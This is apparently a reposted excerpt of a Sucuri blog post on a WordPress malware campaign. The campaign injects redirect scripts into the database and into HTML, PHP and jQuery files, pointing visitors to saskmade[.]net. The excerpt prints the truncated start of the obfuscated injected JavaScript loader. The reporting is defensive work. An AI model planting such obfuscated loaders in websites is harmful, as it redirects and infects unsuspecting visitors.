Home | News | Sucuri Security News | Saskmade[.]net Redirects

Saskmade[.]net Redirects

Saskmade[.]net Redirects

Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

The general idea of the malware is the same, but the domain name and obfuscation has changed slightly.

For example, in the wp_post table they now inject this script:

In the section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=[‘length’,’fromCharCode‘,’createElement’,’type’,’async’,’code121′,’src’,’appendChild’,’getElementsByTagName’,’script’];(function(_0x546a53,
…skipped…

Continue reading Saskmade[.]net Redirects at Sucuri Blog.

https://blog.sucuri.net/?fwp_blog_categories=wordpress-security

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.